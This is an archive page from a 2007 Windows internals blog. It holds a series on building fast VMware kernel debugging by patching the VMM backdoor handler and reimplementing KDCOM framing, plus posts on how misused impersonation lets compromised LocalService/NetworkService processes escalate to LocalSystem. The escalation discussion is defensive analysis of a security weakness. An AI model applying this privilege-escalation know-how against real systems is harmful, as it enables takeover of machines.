Archive for the ‘NT Internals’ Category

Fast kernel debugging for VMware, part 5: Bridging the Gap to DbgEng.dll

Wednesday, October 10th, 2007

The previous article in the virtualized kernel debugging series described some of the details behind how VMKD communicates with the outside world via some modifications to the VMware VMM.

Although getting from the operating system kernel to the outside world is certainly an important milestone with respect to improved virtual machine kernel debugging, it is still necessary to somehow connect the last set of dots between the modified VMware VMM and the debugger (DbgEng.dll). The debugger doesn’t really have native support for what VMKD attempts to do. Like the KD transport module code that runs in kernel mode on the target, DbgEng expects to be talking to a hardware interface (through a user mode accessible API) in order to send and receive data from the target.

There is some support in DbgEng that can be salvaged to communicate with the VMM-side portion of VMKD, which is the “native” support for debugging over named pipe (or TCP, the latter being apparently functional but completely undocumented, which is perhaps unsurprising as there’s no public server end for that as there is for named pipe kernel debugging). However, there’s a problem with using this part of DbgEng’s support for kernel debugging. Although it does allow us to easily talk to DbgEng without having to patch it (a definite plus, as patching two completely isolated programs from two different vendors is a recipe for an extremely brittle program), this support for named pipe or TCP transports for KD is not without its downsides.

Specifically, the named pipe and TCP transport logic is essentially a bolt-on, after-the-fact addition to the serial port (KDCOM) support in DbgEng. (This is why, among other things, kernel debugging over named pipe always starts with kd -k com:pipe,….) What this means in terms of VMKD is that DbgEng expects that anything that it would be speaking to over named pipe or TCP is going to be implementing the low-level KDCOM framing protocol, with the high level KD protocol running on top of that. The KDCOM framing protocol is unfortunately a fairly unwieldy and messy protocol (it is designed to work with minimal dependencies and without a reliable way of knowing whether the remote end of the serial port is even connected, much less receiving data).

Essentially, the KDCOM framing protocol is to TCP as the high level KD protocol is to, say, HTTP in terms of networking protocols. KDCOM takes care of all the low level goo with respect to retransmits, acknowledgments, and everything else about establishing and maintaining a reliable connection with the remote end of the kernel debugger connection. While KDCOM is nowhere near as complex as TCP (thankfully!), it is not without its share of nuances, and it is certainly not publicly documented. (There was originally some partial documentation of an ancient version of the KDCOM protocol released in the NT 3.51 DDK in terms of source code to a partially operational kernel debugger client, with additional aspects covered in the Windows 2000 DDK. There is unfortunately no mention at all of any of this in any recent DDKs or WDKs, as KDCOM has long since disappeared into “no longer documented land”, an irritating habit of many old kernel APIs.)

The fact that there is no way to directly inject high level KD protocol data into DbgEng (aside from patching non-exported internal routines in the debugger, which is certainly no desirable from a future compatibility standpoint) presents a rather troublesome problem. By virtue of taking the approach of replacing KdSendPacket and KdReceivePacket in the guest, the code that was formerly responsible for maintaining the server-end of the low-level KDCOM link is no longer in use. That is, the data coming out of the kernel is raw high-level KD protocol data and not KDCOM data, and yet DbgEng can only interpret KDCOM-framed data over TCP or named pipe.

The solution that I ended up developing to counteract this problem, while a logical consequence of this limitation, is nonetheless unwieldy. In order to communicate with DbgEng, VMKD essentially had to re-implement the entire low-level KDCOM framing protocol so that KD packets can be transferred to and received from an unmodified DbgEng using the already-existing KDCOM over named pipe support. This approach entailed a rather unfortunate amount of extra baggage that needed to be carried around as many features of the KDCOM protocol are unnecessary in light of the new environment that local virtual machine kernel debugging presents.

In the interests of both reducing the complexity of the kernel mode code running in guest operating systems and improving the performance of VMKD (with respect to any possible “overhead traffic”, such as retransmits or resynchronization related requests), the KDCOM framing protocol is implemented host-side in the logic that is running in the modified VMM. This approach also had the additional advantage (during the development process) of the KDCOM framing logic being relatively easily debuggable with a conventional debugger on the host machine. This is in stark contrast to almost all of the guest-side kernel mode driver, which by virtue of being right in the middle of the communication path with the kernel debugger itself, happens to be unfortunately immune to being debugged via the conventional kernel debugger. (A VMM-implemented OS-agnostic debugger, similar in principal to a hardware debugger (ICE) could conceivably have been used to debug the guest-side driver logic if necessary, but putting the KDCOM framing code in user mode host-side is simply much more convenient.)

The KDCOM framing code in the host-side portion of VMKD fulfills the last major piece of the project. At this point, it is now possible to get kernel debugger send and receive requests into and out of the kernel with an accelerated interface that is optimized for execution in a VM, and successfully transport this data to and from DbgEng for consumption by the kernel debugger.

One alternative that I explored to intercepting execution at KdSendPacket and KdReceivePacket guest-side was to simply hook the internal KDCOM routines for sending and receiving characters from the serial port. This approach, while saving the trouble of having to reimplement KDCOM essentially from the ground up, proved problematic and less reliable than I had initially hoped (I suspect timing and buffering differences from a real 16-byte-buffering UART were at fault for the reliability issues this approach encountered). Furthermore, such an approach was in general somewhat less performant than the KdSendPacket and KdReceivePacket solution, as all of the KDCOM “meta-traffic” with respect to resends, acknowledgments, and the like needed to traverse the guest to host boundary instead of being confined to just the host as in the model that VMKD uses currently.

Next time: Future directions that could be taken on VMKD’s general approach to improving the kernel debugging experience with respect to virtual machines.

Fast kernel debugging for VMware, part 4: Communicating with the VMware VMM

Tuesday, October 9th, 2007

Yesterday, I outlined some of the general principles behind how guest to host communication in VMs work, and why the virtual serial port isn’t really all that great of a way to talk to the outside world from a VM. Keeping this information in mind, it should be possible to do much better in a VM, but it is first necessary to develop a way to communicate with the outside world from within a VMware guest.

It turns out that, as previously mentioned, that there happen to be a lot of things already built-in to VMware that need to escape from the guest in order to notify the host of some special event. Aside from the enhanced (virtualization-aware) hardware drivers that ship with VMware Tools (the VMware virtualization-aware addon package for VMware guests), for example, there are a number of “convenience features” that utilize specialized back-channel communication interfaces to talk to code running in the VMM.

While not publicly documented by VMware, these interfaces have been reverse engineered and pseudo-documented publicly by enterprising third parties. It turns out the VMware has a generalized interface (a “fake” I/O port) that can be accessed to essentially call a predefined function running in the VMM, which performs the requested task and returns to the VM. This “fake” I/O port does not correspond to how other I/O ports work (in particular, additional registers are used). Virtually all (no pun intended) of the VMware Tools “convenience features”, from mouse pointer tracking to host to guest time synchronization use the VMware I/O port to perform their magic.

Because there is already information publicly available regarding the I/O port, and because many of the tasks performed using it are relatively easy to find host-side in terms of the code that runs, the I/O port is an attractive target for a communication mechanism. The mechanisms by which to use it guest-side have been publicly documented enough to be fairly easy to use from a code standpoint. However, there’s still the problem of what happens once the I/O port is triggered, as there isn’t exactly a built-in command that does anything like take data and magically send it to the kernel debugger.

For this, as alluded to previously, it is necessary to do a bit of poking around in the VMware VMM in order to locate a handler for an I/O port command that would be feasible to replace for purposes of shuttling data in and out of the VM to the kernel debugger. Although the VMware Tools I/O port interface is likely not designed (VMM-side, anyway) for high performance, high speed data transfers (at least compared to the mechanisms that, say, the virtualization-aware NIC driver might use), it is at the very least orders of magnitude better than the virtual serial port, certainly enough to provide serious performance improvements with respect to kernel debugging, assuming all goes according to plan.

Looking through the list of I/O port commands that have been publicly documented (if somewhat unofficially), there are one or two that could possibly be replaced without any real negative impacts on the operation of the VM itself. One of these commands (0x12) is designed to pop-up the “Operating System Not Found” dialog. This command is actually used by the VMware BIOS code in the VM if it can’t find a bootable OS, and not typically by VMware Tools itself. Since any VM that anyone would possibly be kernel debugging must by definition have a bootable operating system installed, axing the “OS Not Found” dialog is certainly no great loss for that case. As an added bonus, because this I/O port command displays UI and accesses string resources, the handler for it happened to be fairly easy to locate in the VMM code.

In terms of the VMM code, the handler for the OS Not Found dialog command looks something like so:

int __cdecl OSNotFoundHandler()
{
   if (!IsVMInPrivilegedMode()) /* CPL=0 check */
   {
     log error message;
     return -1;
   }

   load string resources;
   display message box;

   return somefunc();
}

Our mission here is really to just patch out the existing code with something that knows how to talk to take data from the guest and move it to the kernel debugger, and vice versa. A naive approach might be to try and access the guest’s registers and use them to convey the data words to transfer (it would appear that many of the I/O port handlers do have access to the guest’s registers as many of the I/O port commands modify the register data of the guest), but this approach would incur a large number of VM exits and therefore be suboptimal.

A better approach would be to create some sort of shared memory region in the VM and then simply use the I/O port command as a signal that data is ready to be sent or that the VM is now waiting for data to be received. (The execution of the VM, or at least the current virtual CPU, appears to be suspended while the I/O port handler is running. In the case of the kernel debugger, all but one CPU would be halted while a KdSendPacket or KdReceivePacket call is being made, making the call essentially one that blocks execution of the entire VM until it returns.)

There’s a slight problem with this approach, however. There needs to be a way to communicate the address of the shared memory region from the guest to the modified VMM code, and then the modified VMM code needs to be able to translate the address supplied by the guest to an address in the VMM’s address space host-side. While the VMware VMM most assuredly has some sort of capability to do this, finding it and using it would make the (already somewhat invasive) patches to the VMM even more likely to break across VMware versions, making such an address translation approach undesirable from the perspective of someone doing this without the help of the actual vendor.

There is, however, a more unsophisticated approach that can be taken: The code running in the guest can simply allocate non-paged physical memory, fill it with a known value, and then have the host-side code (in the VMM) simply scan the entire VMM virtual address space for the known value set by the guest in order to locate the shared memory region in host-relative virtual address space. The approach is slow and about the farthest thing from elegant, but it does work (and it only needs to be done once per boot, assuming the VMM doesn’t move pinned physical pages around in its virtual address space). Even if the VMM does occasionally move pages around, it is possible to compensate for this, and assuming such moves are infrequent still achieve acceptable performance.

The astute reader might note that this introduces a slight hole whereby a user mode caller in the VM could spoof the signature used to locate the shared memory block and trick the VMM-side code into talking to it instead of the KD logic running in kernel mode (after creating the spoofed signature, a malicious user mode process would wait for the kernel mode code to try and contact the VMM, and hope that its spoofed region would be located first). This could certainly be solved by tighter integration with the VMM (and could be quite easily eliminated by having the guest code pass an address in a register which the VMM could translate instead of doing a string hunt through virtual address space), but in the interest of maintaining broad compatibility across VMware VMMs, I have not chosen to go this route for the initial release.

As it turns out, spoofing the link with the kernel debugger is not really all that much of a problem here, as due the way VMKD is designed, it is up to the guest-side code to actually act on the data that is moved into the shared memory region, and a non-privileged user mode process would have limited ability to do so. It could certainly attempt to confuse the kernel debugger, however.

After the guest-side virtual address of the shared memory region is established, the guest and the host-side code running in the VMM can now communicate by filling the shared memory region with data. The guest can then send the I/O port command in order to tell the host-side code to send the data in the shared memory region, and/or wait for and copy in data destined from a remote kernel debugger to the code running in the guest.

With this model, the guest is entirely responsible for driving the kernel debugger connection in that the VMM code is not allowed to touch the shared memory region unless it has exclusive access (which is true if and only if the VM is currently waiting on an I/O port call to the patched handler in the VMM). However, as the low-level KD data transmission model is synchronous and not event-driven, this does not pose a problem for our purposes, thus allowing a fairly simple and yet relatively performant mechanism to connect the KD stub in the kernel to the actual kernel debugger.

Now that data can be both received from the guest and sent to the guest by means of the I/O port interface combined with the shared memory region, all that remains is to interface the debugger (DbgEng.dll) with the patched I/O port handler running in the VMM.

It turns out that there’s a couple of twists relating to this final step that make it more difficult than what one might initially expect, however. Expect to see details on that (and more) on the next installment of the VMKD series…

Fast kernel debugging for VMware, part 3: Guest to Host Communication Overview

Monday, October 8th, 2007

In the previous installment of this series, I outlined the basic architecture of the KD transport module interface from the perspective of the kernel. This article focuses upon the next step in the fast VM KD project, which is getting data out of the VM (or in and out of VMs in general, when dealing with virtualization).

At this point, it’s all but decided that the way to gain access to KD traffic kernel-side is to either intercept or replace KdSendPacket and KdReceivePacket, or some dependecy of those routines through which KD data traffic flows. However, once access to KD traffic is gained, there is still the matter of getting data out of the VM and to the host (and from there to the kernel debugger), as well as moving data from the kernel debugger to the host and then the VM. To better understand how it is possible to improve upon a virtual serial port in terms of kernel debugging in a VM, however, it is first necessary to gain a basic working understanding of how VMMs virtualize hardware devices.

While a conventional kernel debugger transport module uses a physical I/O device that is connected via cable to the kernel debugger computer, this is essentially an obsolete way of approaching the matter for a virtual machine, as the VMM running on the host has direct access to the guest’s memory. Furthermore, practically all VMMs (of which VMware is certainly no exception) typically have a “back-channel” communication mechanism by which the guest can communicate with the host and vice versa, without going through the confines of hardware interfaces that were designed and implemented for physical devices. For example, the accelerated video and network drivers that most virtualization products ship typically use such a back-channel interface to move data into and out of the guest in an efficient fashion.

The typical optimization that is done with these accelerated drivers is to buffer data in some sort of shared or pre-registered memory region until a complete “transaction” of some sort is finished, following which the guest (or host) is notified that there is data to be processed. This approach is typically taken because it is advantageous to avoid any VM exit, that is, any event that diverts control flow away from the guest code and into code living in the VMM. Such actions are necessary because the VM by design does not have truly direct access to physical hardware devices (and indeed in many cases, such as with the NICs that are virtualized by most VM software, the hardware interface presented to the guest are likely to be completely incompatible with those in use in reality on the physical host for such devices).

A VMM handles this sort of case by arranging to gaining control when a dangerous or privileged operation, such as a hardware access, is being attempted. Now, although this does allow the VMM to emulate the operation and return control to the guest after performing the requested operation, many pre-existing hardware interfaces are not typically all that optimal for direct emulation by a VMM. The reason for this, it turns out, is typically that a VM exit is a fairly expensive operation (relative to many types of direct hardware access on a physical machine, such as a port I/O attempt), and many pre-existing hardware interfaces tend to assume that talking to the hardware is a fairly high-speed operation. Although emerging virtualization technologies (such as TLB tagging) are working to reduce the cost of VM exits, reducing them is definitely a good thing for performance, especially with current-generation virtualization hardware and software. To provide an example of how VM exits can incur a non-trivial performance overhead, with a serial port, one typically needs to perform an I/O access on every character, which means that a VM exit is being performed on every single character sent or received, at least in the fashion that KDCOM.DLL uses the serial port.

Furthermore, other peculiars of hardware interfaces, such as a requirement to, say, busy-spin for a certain number of microseconds after making a particular request to ensure that the hardware has had time to process the request are also typically undesirable in a guest VM. (The fact that a VM exit happens on every character isn’t really the only performance drag in the case of a virtual serial port, either. There is also the fact that serial ports are only designed to operate at a set speed, and the VMware serial port will attempt to restrain itself to the baud rate. Together, these two aspects of how the virtual serial port function conspire to drag down the performance of virtual serial port kernel debugging to the familiar low-speeds that one might expect with kernel debugging over physical serial ports, if even that level of performance is reached.)

The strategy of buffering data until a complete “transaction” is ready to be sent or received is, as previously mentioned, one common way to improve the performance of virtual hardware device I/O; for example, a VM-optimized NIC driver might use a shared memory region to wait until complete packets are ready to be sent or received, and then use a VMM back-channel interface to arrange for the data to be processed in an event-driven fashion.

This is the general approach that would be ideal to take with the VMKD project, that is, to buffer data until a complete KD packet (or at least a sizable amount of data) is available, and then transmit (or receive) the data. Additionally, the programmed baud rate is really not something that VMKD needs to restrict itself to, the KD protocol doesn’t really have any inherent speed limits other than the fact that KDCOM.DLL is designed to talk to a real serial port, which does not have unlimited transfer speed.

In fact, if both KdSendPacket and KdReceivePacket were completely reimplemented guest-side, all the anachronisms associated with the aging serial port hardware interface could be completely discarded and the host-side transport logic for the VM could be freed to consider the most optimal mechanism to move data into and out of the VM. This is in principal much like how enhanced network card drivers provided by many virtualization vendors for their guests operate. To accomplish this, however, a workable method for communicating with the outside world from the perspective of the guest is needed.

Next time: The specifics of one approach for getting data into and out of VMware guests.

Fast kernel debugging for VMware, part 2: KD Transport Module Interface

Friday, October 5th, 2007

In the last post in this series, I outlined some of the basic ideas behind my project to speed kernel debugging on VMware. This posting expands upon some of the details of the kernel debugger API interface itself (from a kernel perspective).

The low level (transport or framing) portion of the KD interface is, as previously mentioned, abstracted from the kernel through a uniform interface. This interface consists of a standard set of routines that are exported from a particular KD transport module DLL, which are used to both communicate with the remote kernel debugger and notify the transport module of certain events (such as power transitions) so that the KD I/O hardware can be programmed appropriately. The following routines comprise this interface:

  1. KdD0Transition
  2. KdD3Transition
  3. KdDebuggerInitialize0
  4. KdDebuggerInitialize1
  5. KdReceivePacket
  6. KdRestore
  7. KdSave
  8. KdSendPacket

Most of these routines are related to power transition or KD enable/disable events (or system initialization). For the purposes of VMKD, these events are not really of a whole lot of interest as we don’t have any real hardware to program.

However, there are two APIs that are relevant: KdReceivePacket and KdSendPacket. These two routines are responsible for all of the communication between the kernel itself and the remote kernel debugger.

Although the KD transport module interface is not officially documented (or supported), it is not difficult to create prototypes for the exports that are relevant. The following are the prototypes that I have created for KdReceivePacket and KdSendPacket:

KD_RECV_CODE
KdReceivePacket(
	__in ULONG PacketType,
	__inout_opt PKD_BUFFER PacketData,
	__inout_opt PKD_BUFFER SecondaryData,
	__out_opt PULONG PayloadBytes,
	__inout_opt PKD_CONTEXT KdContext
	);

VOID
KdSendPacket(
	__in ULONG PacketType,
	__in PKD_BUFFER PacketData,
	__in_opt PKD_BUFFER SecondaryData,
	__inout PKD_CONTEXT KdContext
	);

typedef struct _KD_BUFFER
{
	USHORT  Length;
	USHORT  MaximumLength;
	PUCHAR  Data;
} KD_BUFFER, * PKD_BUFFER;

typedef struct _KD_CONTEXT
{
	ULONG   RetryCount;
	BOOLEAN BreakInRequested;
} KD_CONTEXT, * PKD_CONTEXT;

typedef enum _KD_RECV_CODE
{
	KD_RECV_CODE_OK       = 0,
	KD_RECV_CODE_TIMEOUT  = 1,
	KD_RECV_CODE_FAILED   = 2
} KD_RECV_CODE, * PKD_RECV_CODE;

At a high level glance, both of these routines operate synchronously and only return once the operation either times out or the data has been successfully transmitted or received by the remote end of the KD connection. Both routines are normally expected to be called with the kernel’s internal KD lock held and all but the current processor halted.

In general, both routines normally guarantee successful transmission or reception of data before they return. There are a couple of one-off exceptions to this rule, however:

  • KdSendPacket normally guarantees that the data has been received and acknowledged by the remote end. However, if the request being sent is a debug print notification, a symbol load notification, or a .kdfiles request, KdSendPacket contains a special exemption that allows the transmission to time out and silently fail after several attempts. This is because these requests can happen normally and don’t always warrant a debugger break in. (For example, a debug print doesn’t halt the system until you attach the kernel debugger because of this exemption.)
  • KdReceivePacket will keep trying to receive the packet until it either times out (i.e. there is no activity on the KD link for a specific amount of read attempts), successfully receives a good packet and acknowledges it, or receives a resend or resynchronize request (the latter two being specific to the KD protocol module and its internal framing protocol used “on the wire”).
  • KdReceivePacket supports a special type of request by the caller to check if there is a debugger present and requesting a break in at the instant in time when it is called (returning immediately with the result). This mode is used by the kernel on the system timer tick to periodically check if the kernel debugger is requesting to break in.

While the system is running normally, the kernel periodically invokes KdReceivePacket with the special mode that directs the KD transport to check for an immediate break in request. If no break in request is currently detected, then execution continues normally, otherwise the kernel enters into a loop where it waits for commands from the remote kernel debugger and acts upon any received requests, sending the responses back to the remote kernel debugger via KdSendPacket.

After the system is in the break-in receive loop, KdReceivePacket is called repeatedly while the rest of the system is halted and the KD lock is held. Commands that are successfully received are dispatched to the appropriate high level KD protocol request handler, and any response data is transmitted back to the kernel debugger, following which the receive loop continues so that the next request can be handled (unless the last request was one to resume execution, of course). The kernel can also enter the break-in receive loop in response to an exception, which is how tracing and breakpoint events are signalled to the remote kernel debugger.

Given all of this, it’s not difficult to see that reimplementing KdSendPacket and KdReceivePacket (or capturing the serial I/O that KDCOM does in its implementation of these routines) guest-side is the clear way to go for high speed kernel debugging for VMs. (Among other things, at the KdSendPacket and KdReceivePacket level, the contents of the high level KD protocol are essentially all but transparent to the transport module, which means that the high level KD protocol is free to continue to evolve without much chance of serious compatibility breaks with the low level KD transport modules.)

However, things are unfortunately not quite as simple as they might seem with that front. More on that in a future post.

Fast kernel debugging for VMware, part 1: Overview

Thursday, October 4th, 2007

Note: If you are just looking for the high speed VMware kernel debugging program, then you can find it here. This post series outlines the basic design principles behind VMKD.

One of the interesting talks at Blue Hat was one about virtualization and security. There’s a lot of good stuff that was touched on (such as the fact that VMware still implements a hub, meaning that VMs on the same VMnet can still sniff eachother’s traffic).

Anyways, watching the talk got me thinking again about how much kernel debugging VMs is a slow and painful experience today, especially if you’ve used 1394 debugging frequently.

While kd-over-1394 is quite fast (as is local kd), you can’t do that in any virtualization software that I’m aware of today (none of them virtualize 1394, and furthermore, as far as I know none of them even support USB2 debugging either, even VMware Workstation 6).

This means that if you’re kernel debugging a VM in today’s world, you’re pretty much left high and dry and have to use the dreaded virtual serial port approach. Because the virtual serial port has to act like a real serial port, it’s also slow, just like a real serial port (otherwise, timings get off and programs that talk to the serial port break all over the place). This means that although you might be debugging a completely local VM, you’re still throttled to serial port speeds (115200bps). Although it should certainly technically be possible to do better in a VM, none of the virtualization vendors support the virtual hardware required for the other, faster KD transports.

However, that got me thinking a bit. Windows doesn’t really need a virtual serial port or a virtual 1394 port to serve as a kernel debugging target because of any intrinsic, special property of serial or 1394 or USB2. Those interfaces are really just mechanisms to move bits from the target computer to the debugger computer and back again, while requiring minimal interaction with the rest of the system (it is important that the kernel debugger code in the target computer be as minimalistic and self-contained as possible or many situations where you just can’t debug code because it is used by the kernel debugger itself would start cropping up – this is why there isn’t a TCP transport for kernel debugging, among other things).

Now with a VM (as opposed to a physical computer), getting bits to and from an external kernel debugger and the kernel running in the VM is really quite easy. After all, the VM monitor can just directly read and write from the VM’s physical memory, just like that, without a need for indirecting through a real (or virtual) I/O interconnect interface.

So I got to be thinking that it should theoretically be possible to write a kernel debugger transport module that instead of talking to a serial, 1394, or USB2 port, talks to the local VMM and asks it to copy memory to and from the outside world (and thus the kernel debugger). After the data is safely out of the VM, it can be transported over to the kernel debugger (and back) with the mechanism of choice.

It turns out that Windows KD support is implemented in a way that is fairly conducive to this approach. The KD protocol is divided up into essentially two different parts. There’s the high level half, which is essentially a command set that allows the kernel debugger to request that the KD stub in the kernel perform an operation (like change the active register set, set a breakpoint, write memory, or soforth). The high level portion of the KD protocol sits on top of what I call the low level or (framing) portion of the KD protocol, which is a (potentially hardware dependant) transport interface that provides for reliable delivery of high level KD requests and responses between the KD program on a remote computer and the KD stub in the kernel of the target computer.

The low level KD protocol is abstracted out via a set of kernel debugger protocol modules (which are simple kernel mode DLLs) that are used by the kernel to talk to the various pieces of hardware that are supported for kernel debugging. For example, there is a module to talk to the serial port (kdcom.dll), and a module to talk to the 1394 controller (kd1394.dll).

These modules export a uniform API that essentially allows the kernel to request reliable (“mostly reliable”) transport of a high level KD request (say a notification that an exception has occured) from the kernel to the KD program, and back again.

This interface is fortunate from the perspective of someone who might want to, say, develop a high speed kernel debugger module for a VM running under a known VM monitor. Such a KD protocol module could take advantage of the fact that it knows that it’s running under a specific VM monitor, and use the VM monitor’s built-in VM exit / VM enter capabilities to quickly tell the VM monitor to copy data into and out of the VM. (Most VMs have some sort of “backdoor” interface for optimized drivers and enhanced guest capabilities, such as a way for the guest to tell the host when its mouse pointer has left the guest’s screen. For example, in the case of VMware, there is a “VMware Tools” program that you can install which provides this capability through a special “backdoor” interface to that allows the VM to request a “VM exit” for the purposes of having the VM monitor perform a specialized task.)

Next time: Examining the KD module interface, and more.

How least privilege is that service, anyway (or much ado about impersonation) – part 2

Wednesday, August 8th, 2007

Last time, I described some of the details behind impersonation (including a very brief overview of some of the dangers of using it improperly, and how to use impersonation safely via Security Quality of Service). I also mentioned that it might be possible to go from a compromised LocalService / NetworkService to full LocalSystem access in some circumstances. This article expands upon that concept, and ties together just what impersonation means for low-privileged services and the clients that talk to them.

As I mentioned before, impersonation is not really broken by design as it might appear at first glance, and it is in fact possible to use it correctly via setting up a correct SQOS when making calls out to impersonation-enabled IPC servers. Many things do correctly use impersonation, in fact, just to be clear about that. (Then again, many things also use strcpy correctly (e.g. after an explicit length check). It’s just the ones that don’t which get all the bad press…)

That being said, as with strcpy, it can be easy to misuse impersonation, often to dangerous consequences. As they say, the devil is often in the details. The fact is that there exist a great many things out there which simply don’t use impersonation correctly. Whether this is just due to how they are designed or ignorance of the sensitive nature of allowing an untrusted server to impersonate ones security concept is debatable (though in many cases I would tend towards the latter), but for now, many programs just plain get impersonation wrong.

Microsoft is certainly not ignorant to the matter (for example, David’s post describes how Office wrappers CreateFile to ensure that it never gets tricked into allowing impersonation, because the wrapper by default doesn’t permit remote servers to fully impersonate the caller via the proper use of SQOS). However, the defaults remain permissive at least as far as APIs that connect to impersonation-enabled servers (e.g. named pipes, RPC, LPC), and by default allow full impersonation by the server unless the client program explicitly specifies a different SQOS. Even the best people make mistakes, and Microsoft is certainly no exception to this rule – programmers are, after all, only human.

In retrospect, if the security system were first being designed in today’s day and age instead of back in the days of NT 3.1, I’m sure the designers would have chosen a less security sensitive default, but the reality is that the default can probably never change due to massive application compatibility issues.

Back to the issue of LocalService / NetworkService and svchost, however. Many of these low privileged services have “careless” clients that connect to impersonation-enabled IPC servers with high privileges, even in Windows Server 2008. Moreover, due to the fact that LocalService / NetworkService isolation is from a security standpoint all but paper thin prior to Windows Server 2003 (and better, though only in the non-shared-process, that is, non-svchost case in Vista and Windows server 2008), the sort of additive attack surface problem I described in the previous article comes into play. To give a basic example, try attaching to the svchost that runs the “LocalServiceNetworkRestricted” service group, including Eventlog, Dhcp (the DHCP client), and several other services (in Windows Server 2008) and setting the following breakpoint (be sure to disable HTTP symbol server access beforehand or you’ll deadlock the debugger and have to reboot – another reason why I dislike svchost services in general):

bp RPCRT4!RpcImpersonateClient "kv ; gu ; !token ; g"

Then, wait for an event log message to be written to the system event log (a fairly regular occurance, though if you want you can use msg.exe to send a TS messge from any account if you don’t want to wait, which will result in the message being logged to the system event log immediately courtsey of the hard error logging facility). You’ll see something like this:

Call Site
RPCRT4!RpcImpersonateClient
wevtsvc!EvtCheckAccess+0x68
wevtsvc!LegacyAccessCheck+0x15e
wevtsvc!ElfrReportEventW+0x2b2
RPCRT4!Invoke+0x65
[…]

TS Session ID: 0x1
User: S-1-5-18 (LocalSystem)
Groups:
00 S-1-5-32-544 (Administrators)
Attributes – Default Enabled Owner
01 S-1-1-0
Attributes – Mandatory Default Enabled
02 S-1-5-11
Attributes – Mandatory Default Enabled
03 S-1-16-16384 (System Integrity)
Attributes – GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-18
Privs:
00 0x000000002 SeCreateTokenPrivilege Attributes –
[…]
Auth ID: 0:3e7 (SYSTEM_LUID)
Impersonation Level: Impersonation
TokenType: Impersonation

Again, checking winnt.h, it is immediately obvious that the eventlog service (which runs as LocalService) gets RPC requests from LocalSystem at System integrity level, with the caller enabling full impersonation and transferring all of its far-reaching privileges, many of them alone enough to completely compromise the system. Now, this and of itself might not be so bad, if not for the fact that a bunch of other “non-privileged” services share the same effective security context as eventlog (thanks to the magic of svchost), such as the DHCP client, significant parts of the Windows Audio subsystem (in Vista or in Srv08 if you enable audio), and various other services (such as the Security Center / Peer Networking Identity Manager / Peer Name Resolution Protocol services, at least in Vista).

What does all of this really mean? Well, several of those above services are network facing (the DHCP client certainly is), and they all likely expose some sort of user-facing IPC interface as well. Due to the fact that they all share the same security context as eventlog, a compromise in any one of those services could trivially be escalated to LocalSystem by an attacker who is the least bit clever. And that is how a hypothetical vulnerability in a non-privileged network-facing service like the DHCP client might get blown up into a LocalSystem compromise, thanks to svchost.

(Actually, even the DHCP client alone seems to expose its own RPC interface that is periodically connected to by LocalSystem processes who allow impersonation, so in the case of an (again hypothetical) vulnerability DHCP client service, one wouldn’t even need to go to the trouble of attacking eventlog as the current service would be enough.)

The point of this series is not to point fingers at the DHCP / Windows Audio / Eventlog (or other) services, however, but rather to point out that many of the so-called “low privileged” services are not actually as low privileged as one might think in the current implementation. Much of the fault here actually lies with whatever programs connect to these low-privileged services with full impersonation enabled than the actual services themselves, in fact, but the end result is that many of these services are not nearly as privilege-isolated as we would prefer to believe due to the fact that they are called irresponsibly (e.g. somebody forgot to fill out a SECURITY_QUALITY_OF_SERVICE and accepted the defaults, which amounts to completely trusting the other end of the IPC call).

The problem is even more common when it comes to third party software. I would put forth that at least some of this is a documentation / knowledge transfer problem. For example, how many times have you seen SECURITY_QUALITY_OF_SERVICE mentioned in the MSDN documentation? The CreateFile documentation mentions SQOS-related attributes (impersonation restriction flags) in passing, with only a hint of the trouble you’re setting yourself up for by accepting the defaults. This is especially insidious with CreateFile, as unlike other impersonation-enabled APIs, it’s comparatively very easy to sneak a “bad” filename that points to a dangerous, custom impersonation-enabled named pipe server anywhere a user-specified file is opened and then written to (other impersonation attack approaches typically require that an existing, “well-known” address / name for an IPC server to be compromised as opposed to the luxury of being able to set up a completely new IPC server with a unique name that a program might be tricked into connecting to).

The take-home for this series is then to watch out when you’re connecting to a remote service that allows impersonation. Unless absolutely necessary you should specify the minimum level of impersonation (e.g. SecurityIdentification) instead of granting full access (e.g. SecurityImpersonation, the default). And if you must allow the remote service to use full impersonation, be sure that you aren’t creating a “privilege inversion” where you are transferring high privileges to an otherwise low-privileged, network-facing service.

Oh, and just to be clear, this doesn’t mean that eventlog (or the other services mentioned) are full of security holes outside of the box. You’ll note that I explicitly used a hypothetical vulnerability in the DHCP client service for my example attack scenario. The impersonation misuse does, however, mean that much of the work that has been done in terms of isolating services into their own compartmentalized security contexts isn’t exactly the bullet proof wall one would hope for most LocalService / NetworkService processes (and especially those sharing the same address space). Ironically, though, from certain respects it is the callers of these services that share part or all of the blame (depending on whether the service really requires the ability to fully impersonate its clients like that or not).

As a result, at least from an absolute security perspective, I would consider eventlog / DHCP / AudioSrv (and friends) just as “LocalSystem” in Windows Server 2008 as they were back in Windows 2000, because the reality is that if any of those services are compromised, in today’s (and tommorow’s, with respect to Windows Server 2008, at least judging from the Beta 3 timeframe) implementation, the attacker can elevate themselves to LocalSystem if they are sufficiently clever. That’s not to say that all the work that’s been done since Windows 2000 is wasted, but rather that we’re hardly “all of the way there yet”.

How least privilege is that service, anyway (or much ado about impersonation) – part 1

Monday, August 6th, 2007

Previously, I discussed some of the pitfalls with LocalService and NetworkService, especially with respect to pre-Windows-Vista platforms (e.g. Windows Server 2003).

As I alluded to in that post, however, a case can be made that there still exists a less than ideal circumstance even in Vista / Srv08 with respect to how the least-privilege service initiative has actually paid out. Much of this is due to the compromise between performance and security that was made with packing many unrelated (or loosely related) services into a single svchost process. On Windows Server 2003 and prior platforms, the problem is somewhat more exacerbated as it is much easier for services running under different processes to directly interfere with eachother while running as LocalService / NetworkService, due to a loose setting of the owner field in the process object DACL for LocalService / NetworkService processes.

As it relates to Vista, and downlevel platforms as well, many of these “low privileged” services that run as LocalService or NetworkService are really highly privileged processes in disguise. For a moment, assume that this is actually a design requirement (which is arguable in many cases) and that some of these “low privileged” services are required to be given dangerous abilities (where “dangerous” is defined in this context as could be leveraged to take control of the system or otherwise elevate privileges). A problem then occurs when services that really don’t need to be given high privileges are mixed in the same security context (either the same process in Vista, or the same account (LocalService / NetworService) in downlevel systems. This is due to the obvious fact that mixing code with multiple privilege levels in a way such that code at a lower privilege level can interfere with code at a higher privilege level represents a clear break in the security model.

